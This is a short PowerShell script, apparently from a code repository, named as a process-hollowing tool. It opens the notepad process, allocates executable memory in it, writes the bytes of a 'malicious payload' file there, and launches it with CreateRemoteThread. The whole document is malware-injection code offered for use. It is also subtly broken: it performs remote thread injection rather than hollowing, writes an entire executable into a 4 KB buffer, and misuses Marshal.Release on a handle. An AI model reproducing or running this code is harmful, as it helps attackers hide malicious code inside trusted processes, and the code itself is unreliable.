/
processHollowing.ps1
37 lines (23 loc) · 1.55 KB
/
processHollowing.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
Add-Type -Namespace "kernel32" -Name "Win32" -MemberDefinition @"
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
$targetProcessId = Get-Process -Name "notepad" | Select-Object -ExpandProperty Id
$payloadPath = "C:\path\to\your\malicious\payload.exe"
$hProcess = [kernel32.Win32]::OpenProcess(0x1F0FFF, $false, $targetProcessId)
$allocatedMemory = [kernel32.Win32]::VirtualAllocEx($hProcess, [IntPtr]::Zero, 0x1000, 0x3000, 0x40)
# Write payload to allocated memory
$payload = [System.IO.File]::ReadAllBytes($payloadPath)
$bytesWritten = 0
[kernel32.Win32]::WriteProcessMemory($hProcess, $allocatedMemory, $payload, $payload.Length, [ref]$bytesWritten)
[thread]::Sleep(1000)
[kernel32.Win32]::CreateRemoteThread($hProcess, [IntPtr]::Zero, 0, $allocatedMemory, [IntPtr]::Zero, 0, [IntPtr]::Zero)
if ($hProcess -ne [IntPtr]::Zero) {
[System.Runtime.InteropServices.Marshal]::Release($hProcess)
}